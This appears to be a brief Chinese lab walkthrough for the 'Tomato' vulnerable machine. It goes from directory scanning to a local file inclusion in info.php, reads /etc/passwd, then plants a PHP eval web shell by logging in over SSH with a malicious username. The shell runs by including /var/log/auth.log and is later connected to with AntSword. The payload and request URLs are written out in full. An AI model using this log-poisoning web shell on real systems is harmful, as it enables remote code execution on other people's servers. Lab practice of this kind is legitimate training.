Tomato靶场通关攻略

首先安装好后扫描ip找到靶场的ip

进来只有一个图片啥也不能干

找到ip后就可以扫描IP的目录文件了

进去访问就可以看到antibots目录

访问这个目录可以看见有好多文件

进来看见有个info.php进来看看

查看页面源代码发现存在文件包含漏洞

然后就有目标了这里读取etc/passwd

利用ssh连接写入木马 ssh '<?php @eval($_POST[qwe])?>'@192.168.248.133 -p2211

访问一句话木马
命令成功执行，说明一句话写入成功

view-source:172.16.1.113/antibot_image/antibots/info.php？image=/var/log/auth.log&jason=whoami

view-source:172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=id

然后再用蚁剑成功连接